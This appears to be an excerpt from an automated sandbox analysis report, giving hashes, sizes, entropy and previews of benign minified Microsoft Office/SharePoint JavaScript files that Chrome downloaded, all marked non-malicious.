                                                            File Type:ASCII text, with very long lines (2264)
                                                            Category:downloaded
                                                            Size (bytes):2269
                                                            Entropy (8bit):4.94842791247022
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:1C8B73D6246B757B2085A99655D93C5C
                                                            SHA1:5173A4080EBDE68AB4A2665131C72A56D37F1A40
                                                            SHA-256:9434F5C348AEAE0DC26C506125D3793FFE73E9069E225D72966D2F807629252C
                                                            SHA-512:97877AE36DED792C2A8A19DA8D9838FD1A8E86296D2D4A83F587A7BBBD3F6246DD6279633D801D95B5203E02FD88312EDA44CA1BE531CFC43155BAC250068EC3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/408.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[408],{2377:function(e,t,n){n.r(t),(0,n("fui.util_261").ZW)([{rawString:"#obf-TPromptContainer:focus{outline:1px solid var(--ms-palette-neutralSecondary)}#obf-ToastContainer{background-color:var(--ms-semanticColors-menuBackground);border:1px solid var(--ms-palette-neutralSecondaryAlt)}#obf-ToastContainer #obf-TFormComment{background-color:var(--ms-semanticColors-menuBackground)}#obf-ToastContainer .obf-CancelButton,#obf-ToastContainer .obf-SubmitButton{background-color:var(--ms-palette-themePrimary)}#obf-ToastContainer .obf-CancelButton:hover,#obf-ToastContainer .obf-SubmitButton:hover{background-color:var(--ms-palette-themeDark)}#obf-ToastContainer #obf-TFormTitle,#obf-ToastContainer #obf-TPromptTitle{color:var(--ms-palette-themePrimary)}#obf-ToastContainer .obf-ChoiceGroup input[type=radio]:checked+label>.obf-ChoiceGroupIcon>span{background-color:var(--ms-palette-themePrimary)}#obf-ToastContainer .obf-Choice
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (63604)
                                                            Category:downloaded
                                                            Size (bytes):130560
                                                            Entropy (8bit):5.272245687496742
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:ACDFECB80B06F30C59B48F9B2140E6F5
                                                            SHA1:C46873F855BDABF9943DA278813B53B4DD6FB6D6
                                                            SHA-256:CA46523D06A57712685B5C6B01430B530FE76F8FD5803179FCAA3466770E93A0
                                                            SHA-512:9BD579F55596F100C7A3723AE2345F3C43785BAF0576BFB5060F495FC8B7CCA3BD9FB43EA71B6F39FB68DFA82B80239A862E8186AD2956F2D4DFE1C971BEF293
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/sp-client/odsp.react/odsp.react.lib-9ea4d016.js
                                                            Preview:/*! For license information please see odsp.react.lib-9ea4d016.js.LICENSE.txt */.(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.react.lib"],{react_340:function(e){"use strict";var t=Object.getOwnPropertySymbols,n=Object.prototype.hasOwnProperty,a=Object.prototype.propertyIsEnumerable;function i(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},n=0;n<10;n++)t["_"+String.fromCharCode(n)]=n;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var a={};return"abcdefghijklmnopqrst".split("").forEach(function(e){a[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},a)).join("")}catch(e){return!1}}()?Object.assign:function(e,r){for(var o,s,c=i(e),d=1;d<arguments.length;d++){for(var l in o=Object(arguments[d]))n.ca
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (2703)
                                                            Category:downloaded
                                                            Size (bytes):9770
                                                            Entropy (8bit):5.3043750144081745
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B29570BA36586CDDA9E8AFA74727E23E
                                                            SHA1:C5BB106023DA29F6C25E70DD3766644898DEEA50
                                                            SHA-256:06CBC6B842BB195E40F9536CDAF188CCD8E23CD074CE969D95FAED71CBC19DF9
                                                            SHA-512:E2A785E101D6802ABD03DF3016451727BEA61464DBD1AA62DE5A253FCF171B6748796424A2D95D1ADB6422C647D6CC04775FEE9D84B1CEEA5EAE1FC2230D16DC
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/176.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[176],{10732:function(e,t,n){n.d(t,{a:function(){return g}});var a=n("tslib_538"),i=n("react-lib"),r=n(8),o=n(9),s=n(3147),c=n(3881),d=n(3),l=n(35),u=n(163),f=n(22),p=n(7),m=n(34),_=n(10733),h=n(10734),b=(0,d.c)(function(e,t){var n,o,s,d=t.itemKey,b=null===(n=e.demandItemFacet(u.u,d))||void 0===n?void 0:n.itemKey;if(!b){var g=(null===(o=e.demandItemFacet(f.a,d))||void 0===o?void 0:o.itemKeys)||[];b=null===(s=e.demandItemFacet(u.u,g[0]))||void 0===s?void 0:s.itemKey}var v=e.demandItemFacet(p.a,b)||e.demandItemFacet(m.a,b);if(v){var y=v.webAbsoluteUrl,S=v.listFullUrl,D=(0,l.a)(e,b);if(D){var I=_.a.serialize({webAbsoluteUrl:y,listFullUrl:S}),x=e.demandItemFacet(h.a,I),C=(0,c.e)((null==x?void 0:x.environmentName)||"~default",(null==x?void 0:x.solutionId)||"",D);return i.createElement(r.a,{onExecute:function(){return(0,a.yv)(void 0,void 0,void 0,function(){return(0,a.SO)(this,function(e){return window.open(C,"_blan
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (42541)
                                                            Category:dropped
                                                            Size (bytes):42572
                                                            Entropy (8bit):5.254081499823667
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:CC71166989A554D5342D9285402EEBAC
                                                            SHA1:0C55CE8682270A29ECEF551E085BC2F6A5EE20A9
                                                            SHA-256:4C494EAB4D585D34BAB159E00B2A8EA056078848F472100FBFDE9EA0695A6EE1
                                                            SHA-512:10F357FA2C8F7BB704B32E6C2033B4E1464FE84E171956C74A53E66F9BF87A1C2B53BFAD55EE25394B8707C5CBFBE6E3367926205F98F02BC1E69A42D62DD6FE
                                                            Malicious:false
                                                            Reputation:unknown
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["odsp.util"],{"odsp.util_517":function(e,t,n){function a(e,t){for(var n="";n.length<e;){var a=16*(null!=t?t:Math.random)();n+=(a|=0).toString(16)}return n}function i(){return crypto.getRandomValues(new Uint32Array(1))[0]/4294967296}n.d(t,{vw:function(){return bt},bf:function(){return gt},BR:function(){return Ge},qt:function(){return Ge},wI:function(){return Vt},op:function(){return Ye},mz:function(){return Ze},ru:function(){return Xe},XK:function(){return vt},wh:function(){return je},CA:function(){return Y},qq:function(){return _},Nr:function(){return Q},kj:function(){return m},hz:function(){return xt},p4:function(){return q},j9:function(){return p},oq:function(){return r},mj:function(){return Gt},cX:function(){return Mt},Ov:function(){return T},x9:function(){return T},wV:function(){return nt},v4:function(){return cn},KC:function(){return yt},ze:function(){return St},vs:function(){return It},QL:function(){ret
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (42996)
                                                            Category:downloaded
                                                            Size (bytes):214723
                                                            Entropy (8bit):5.5255314776633035
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:B7F967B1BEBAA13B1A40CF15572F2CB8
                                                            SHA1:DA9B0011765C70988A236823014E531142D10E17
                                                            SHA-256:4754745096A9D25B5A2A1D93A51D934C8E5543EE1CB8A899C187044B0CAF9DFF
                                                            SHA-512:606AD16A69C57A86DF860BF9EDF980C622EC274242FEDE62A0B279505F7D2BEA64DB7A44E420EA235CDC552C5B0000C1BA0CED177359863D2B3DF418F376E0F3
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://shell.cdn.office.net/shellux/suiteux.shell.plus.123849472e039a96754c.js
                                                            Preview:var shellPerformance=window.performance,HighResolutionTimingSupported=!!shellPerformance&&"function"==typeof shellPerformance.mark;HighResolutionTimingSupported&&shellPerformance.mark("shell_plus_start"),(self["suiteux_shell_webpackJsonp_suiteux-main"]=self["suiteux_shell_webpackJsonp_suiteux-main"]||[]).push([["plus"],{8930:function(e,t,n){(t=e.exports=n(93707)(!1)).push([e.id,'.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={display:-ms-flexbox;display:flex;-ms-flex-direction:row;flex-direction:row;border:1px solid hsla(0,0%,100%,0);box-shadow:0 1px 2px 0 rgba(0,0,0,.1);box-sizing:border-box;width:276px;padding-left:0;align-items:flex-start;margin:0 0 17px 16px}html[dir=rtl] .o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\={margin-left:0;margin-right:16px}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=:hover{-webkit-box-shadow:0 8px 16px 0 rgba(0,0,0,.1);box-shadow:0 8px 16px 0 rgba(0,0,0,.1)}.o365cs-base .oxbF2LyKwVB\\/a5\\+4gTMkFg\\=\\=>button{min-width:30px;width:30px;height:36px;paddin
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (4824)
                                                            Category:downloaded
                                                            Size (bytes):12187
                                                            Entropy (8bit):5.476132735322842
                                                            Encrypted:false
                                                            SSDEEP:
                                                            MD5:22643CDD27315CADD56CBEB2F0F9AD86
                                                            SHA1:05F431D7A4B6A78C1790B519857C5A739212D184
                                                            SHA-256:FCA03E0766736F8C54F90CB847D1FBA309D316F86CB4816EDE192E18BD26146B
                                                            SHA-512:E2C17FD92A3B9927EEC3C8F62DA5C3DAAAA96DA42776030850E56A8C552A2DBB0EFB237DE719E1D08F164F9FA5E827CD966734981AE32F18AA73ABF889AF6127
                                                            Malicious:false
                                                            Reputation:unknown
                                                            URL:https://res-1.cdn.office.net/files/odsp-web-prod_2025-01-03.002/odblightspeedwebpack/3.js
                                                            Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[3],{3793:function(e,t,n){n.d(t,{a:function(){return u}});var a=n("react-lib"),i=n("fui.core_220"),r=n(162),o=n(143),s=n(142);const c=(0,i.ir4)("rhfpeu0",null,{r:[".rhfpeu0{gap:8px;height:fit-content;box-sizing:border-box;display:flex;grid-row-start:3;grid-row-end:3;}"],s:["@media screen and (max-width: 480px){.rhfpeu0{flex-direction:column;justify-self:stretch;}}"]}),d=(0,i.Oz8)({gridPositionEnd:{Bdqf98w:"f1a7i8kp",Br312pm:"fd46tj4",Bw0ie65:"fsyjsko",B6n781s:"f1f41i0t",Bv5d0be:"f1jaqex3",v4ugfu:"f2ao6jk"},gridPositionStart:{Bdqf98w:"fsxvdwy",Br312pm:"fwpfdsa",Bw0ie65:"f1e2fz10",Bojbm9c:"f11ihkml",Bv5d0be:"fce5bvx",v4ugfu:"f2ao6jk"},fluidStart:{Bw0ie65:"fsyjsko"},fluidEnd:{Br312pm:"fwpfdsa"}},{d:[".f1a7i8kp{justify-self:end;}",".fd46tj4{grid-column-start:2;}",".fsyjsko{grid-column-end:4;}",".fsxvdwy{justify-self:start;}",".fwpfdsa{grid-column-start:1;}",".f1e2fz10{grid-column-end:2;}"],m:[["@media screen and (
                                                            No static file info